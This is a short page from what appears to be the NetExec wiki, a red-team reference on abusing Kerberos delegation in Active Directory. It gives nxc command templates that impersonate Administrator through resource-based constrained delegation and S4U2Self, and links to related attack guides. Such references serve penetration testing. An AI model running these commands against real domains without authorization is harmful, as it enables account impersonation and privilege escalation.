🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ”§ NetExec Wiki / Delegation

πŸ†• Delegation

RBCD

If you have an object with the msDS-AllowedToActOnBehalfOfOtherIdentity attribute set to an account you control you can use the impersonate flag inside NetExec to automatically execute the Resource Based Constrained Delegation and impersonate any user:

nxc smb <target> -u <username> -p <password> --delegate Administrator

S4U2Self

If you have a computer account you can (nearly) always get local administrator with the s4u2self extension:

nxc smb <target> -u '<username>$' -H <hash> --delegate Administrator --self

Resources:

{% embed url="https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd" %}

{% embed url="https://www.thehacker.recipes/a-d/movement/kerberos/delegations/s4u2self-abuse" %}

{% embed url="https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation" %}